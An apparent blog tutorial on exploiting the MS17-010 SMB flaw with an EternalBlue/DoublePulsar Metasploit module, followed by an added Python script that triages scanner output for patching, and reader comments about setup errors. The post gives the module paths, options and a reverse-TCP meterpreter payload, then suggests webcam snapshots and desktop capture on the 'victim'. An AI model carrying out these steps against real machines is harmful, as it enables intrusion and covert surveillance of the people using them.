Eternalblue and Doublepulsar with Metasploit

Just wanna share it..

I'm using this msf module https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.

Clone it and copy eternalblue_doublepulsar.rb to /usr/share/metasploit-framework/modules/exploits/windows/smb/.



Run msfconsole and scan your local network with auxiliary/scanner/smb/smb_ms17_010 (MS17-010 SMB RCE Detection).



Now use the exploit exploit/windows/smb/eternalblue_doublepulsar.
Set the necessary options, such as RHOST, TARGETARCHITECTURE, TARGET and PROCESSINJECT.
For DOUBLEPULSARPATH and ETERNALBLUEPATH, use the Eternalblue-Doublepulsar-Metasploit/deps/ directory. For example, /root/Eternalblue-Doublepulsar-Metasploit/deps/.
Don't forget to set the PAYLOAD to windows/x64/meterpreter/reverse_tcp (my target uses x64, so I'm using an x64 payload too).

 

Once everything is set, run exploit.




Run some interesting commands, like webcam_list or webcam_snap.

 



A screenshot of the victim's desktop.

 

Tested on my local network; the tool used was Metasploit running on Kali Linux.
That's it, happy hacking!
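
Seen from the patching side, the scan step above doubles as an audit of your own network. The following is an added example, not part of the original post or the Metasploit module: it sorts saved scanner output into hosts that need incident response, hosts that need the MS17-010 patch, and hosts that look fine. The sample lines are constructed, and their message wording is an assumption about the scanner's output format.

```python
import re
from collections import defaultdict

# Constructed sample of smb_ms17_010 console output (not from the original post).
# The message wording is an assumption modelled on the scanner's usual output.
SAMPLE_OUTPUT = """\
[+] 192.168.1.10:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.1.11:445 - Host does NOT appear vulnerable.
[+] 192.168.1.12:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[!] 192.168.1.12:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x00000000
[*] Scanned 3 of 3 hosts (100% complete)
"""

LINE_RE = re.compile(
    r"^\[[+\-!*]\]\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):\d+\s+-\s+(?P<msg>.*)$")

def triage(scan_output):
    """Group hosts from scanner output into remediation buckets."""
    hosts = defaultdict(lambda: {"status": "unknown", "os": None})
    for line in scan_output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # progress lines and banners carry no host verdict
        entry, msg = hosts[m["ip"]], m["msg"]
        if "INFECTED with DoublePulsar" in msg:
            # An implant is already present: this is an incident, not a patch ticket.
            entry["status"] = "infected"
        elif "VULNERABLE to MS17-010" in msg:
            if entry["status"] != "infected":
                entry["status"] = "vulnerable"
            entry["os"] = msg.split(" - ", 1)[1] if " - " in msg else None
        elif "does NOT appear vulnerable" in msg and entry["status"] == "unknown":
            entry["status"] = "not_vulnerable"
    return dict(hosts)

def remediation_plan(hosts):
    """Return (status, ip, os) tuples, most urgent first."""
    order = {"infected": 0, "vulnerable": 1, "unknown": 2, "not_vulnerable": 3}
    return sorted(((h["status"], ip, h["os"]) for ip, h in hosts.items()),
                  key=lambda t: (order[t[0]], t[1]))

if __name__ == "__main__":
    for status, ip, os_name in remediation_plan(triage(SAMPLE_OUTPUT)):
        print(f"{status:<15} {ip:<15} {os_name or ''}")
```
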

Comments

ark beacon ids said…
Hello, I did "dpkg --add-architecture i386 && apt-get update && apt-get install wine32" and got stuck in a boot loop after reboot (enter root, password, press login, but it went back to the login screen). I am running Kali 2016.2, what can I do?



I got this error in Metasploit. What am I doing wrong? I moved the files to the directory as shown in the video.
sh: 1: cd: can't cd to /root/Eternalblue-Doublepulsar-Metasploit/deps/
wine: cannot find L"C:\\windows\\system32\\Eternalblue-2.2.0.exe"